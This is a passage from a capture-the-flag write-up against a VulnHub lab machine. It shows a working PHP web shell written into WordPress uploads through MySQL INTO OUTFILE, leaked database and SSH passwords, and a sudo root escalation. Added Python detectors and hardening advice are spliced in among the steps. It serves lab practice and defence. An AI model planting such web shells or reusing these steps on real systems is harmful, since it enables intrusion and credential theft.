 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

Jackpot! The results of the LFI attack gave me a MySQL username/password combo that I can hopefully use. I repeated the LFI attack to see if I could extract any other valuable information and was presented with a nice MySQL error message, which gave me the path to Apache's webroot.

Using the phpMyAdmin page that was discovered earlier, I was able to log in using the username “root” and password “plbkac”, which I got from the wp-config.php file. Since I had the full path of the WordPress install, as well as a potentially writable directory (“/wp-content/uploads/”), it was time to upload a simple PHP script that will execute shell commands.

cat cmd.php

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>

Convert the file to a hex string.

echo -n $(cat cmd.php) | xxd -p

3c3f70687020696628697373657428245f524551554553545b27636d6427
5d29297b2024636d64203d2028245f524551554553545b22636d64225d29
3b2073797374656d2824636d64293b206563686f20223c2f7072653e2463
6d643c7072653e223b206469653b207d203f3e

I used the “INTO OUTFILE” method to write the cmd.php file into “/var/www/https/blogblog/wp-content/uploads/cmd.php” which will be accessible at “https://192.168.1.119:12380/blogblog/wp-content/uploads/cmd.php”

SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b2024636d64203d2028245f524551554553545b22636d64225d293b2073797374656d2824636d64293b206563686f20223c2f7072653e24636d643c7072653e223b206469653b207d203f3e INTO OUTFILE '/var/www/https/blogblog/wp-content/uploads/cmd.php'
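Both steps above leave a clear trace in the web server's access log: the admin-ajax.php call with a `thumb` value that is a local path rather than a URL, and then requests for a `.php` file under `wp-content/uploads/`, a directory that should only ever serve media. The following is an added detection example (not code from the writeup) that runs both rules over constructed Apache combined-format log lines; the client addresses and timestamps in the sample are made up, and the request paths mirror the ones discussed in this writeup.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access log lines (Apache combined format); not from the original page.
SAMPLE_LOG_LINES = [
    '192.168.1.50 - - [21/Jun/2016:22:10:01 -0400] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 200 512 "-" "Python-urllib/2.7"',
    '10.0.0.7 - - [21/Jun/2016:22:12:00 -0400] "GET /blogblog/?p=5 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [21/Jun/2016:22:12:30 -0400] "GET /blogblog/wp-content/uploads/2016/06/photo.jpg HTTP/1.1" 200 30000 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [21/Jun/2016:22:15:15 -0400] "GET /blogblog/wp-content/uploads/cmd.php?cmd=id HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]

# client ip, remote logname, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCRIPT_EXT = (".php", ".php5", ".phtml", ".phar")


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    target = urlparse(rec["target"])
    rec["path"] = target.path
    rec["query"] = parse_qs(target.query)  # percent-decodes values, so %2e%2e%2f is caught too
    return rec


def is_local_resource(value):
    """True when a supposed thumbnail URL would be read from the local filesystem."""
    parsed = urlparse(value.strip())
    return parsed.scheme not in ("http", "https") or not parsed.hostname


def detect(lines):
    """Return a list of findings, one dict per matched rule and line."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, query = rec["path"], rec["query"]

        # Rule 1: the vulnerable AJAX action invoked with a thumb that is not a remote URL.
        if path.endswith("/wp-admin/admin-ajax.php") and query.get("action") == ["ave_publishPost"]:
            for thumb in query.get("thumb", []):
                if is_local_resource(thumb):
                    findings.append({"rule": "ave_publishPost local file read",
                                     "ip": rec["ip"], "ts": rec["ts"], "detail": thumb})

        # Rule 2: the uploads tree should hold media only; any script request there is suspicious.
        if "/wp-content/uploads/" in path and path.lower().endswith(SCRIPT_EXT):
            findings.append({"rule": "script request under wp-content/uploads",
                             "ip": rec["ip"], "ts": rec["ts"], "detail": path})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG_LINES):
        print(finding)
```

On the prevention side, the write itself depends on the database account having the `FILE` privilege and on `secure_file_priv` being empty; a WordPress site should use a dedicated, unprivileged database user rather than `root`, and the web server should be configured to refuse to execute scripts from the uploads directory so that a dropped file is served as inert text at most.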

Now that I have a limited-access shell, it's time to start the post-exploitation enumeration phase. I always start by downloading my modified version of the “Local Linux Enumeration & Privilege Escalation Script (LinEnum.sh)”, typically using either wget or curl. This script collects history and configuration files, file and folder permissions, network settings and a ton of other potentially valuable info. After the script finishes, I transfer the results back to my machine so I can look through everything that was collected. The first place I look for valuable info is inside the “.bash_history” files, which contain the previous commands that the user has executed. Looking inside “/home/JKanode/.bash_history” I found 2 username/password combos for localhost.

cat JKanode/.bash_history

cat .bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
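The history above is a textbook case of a password leaking because it was typed on the command line (`sshpass -p ...`), where every shell records it. Auditing home directories for this pattern is a cheap control; the block below is an added example (not from the writeup) that scans shell history lines for the common inline-credential forms and reports each hit with the secret redacted, so the report itself does not become a second copy of the password. The sample history and its passwords are constructed.

```python
import re

# Constructed sample history, shaped like the one in the writeup but with made-up values.
SAMPLE_HISTORY = [
    "id",
    "ls -lah",
    "sshpass -p Example-Pass-1 ssh alice@localhost",
    "mysql -u wpuser -pExample-Pass-2 wordpress",
    "export API_TOKEN=Example-Token-3",
    "mysql -u wpuser -p wordpress",  # prompts for the password: nothing leaks
    "ps -ef",
]

# (label, pattern); group 1 is always the secret so it can be redacted uniformly.
CREDENTIAL_PATTERNS = [
    ("sshpass inline password", re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("mysql inline password", re.compile(r"\bmysql\b.*?\s(?:--password=|-p)(\S+)")),
    ("curl/wget inline credentials", re.compile(r"\b(?:curl|wget)\b.*?\s(?:-u|--user|--password|--http-password)[= ](\S+)")),
    ("secret exported in environment", re.compile(r"\bexport\s+\w*(?:PASS|PASSWORD|SECRET|TOKEN)\w*=(\S+)", re.IGNORECASE)),
]


def redact(line, match):
    """Replace the captured secret with a marker, leaving the rest of the command intact."""
    start, end = match.span(1)
    return line[:start] + "<redacted>" + line[end:]


def scan_history(lines):
    """Return one finding per (line, pattern) hit: line number, label and redacted command."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for label, pattern in CREDENTIAL_PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append({"line": number, "type": label, "command": redact(line, match)})
    return findings


if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(f"line {finding['line']:>3}  {finding['type']:<32} {finding['command']}")
```

The fix for the underlying habit is to use SSH keys instead of `sshpass`, let tools prompt for passwords rather than accept them as arguments, and, where a secret really must be typed, keep it out of history with `HISTCONTROL=ignorespace` (a leading space) or a matching `HISTIGNORE` entry. Passwords that have already landed in a history file should be treated as exposed and rotated.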

Next, I SSH’d into the “peter” account using the password “JZQuyIN5” and checked the user privileges.

id

uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Looks like the current user is in the sudo group. Time to spawn a new bash shell using the sudo command.

sudo /bin/bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
root@red:~# id
uid=0(root) gid=0(root) groups=0(root)

Looks like it's game over; now it's time to get the flag!

Thanks to g0tmi1k and the rest of the VulnHub Team for putting together and hosting another great challenge.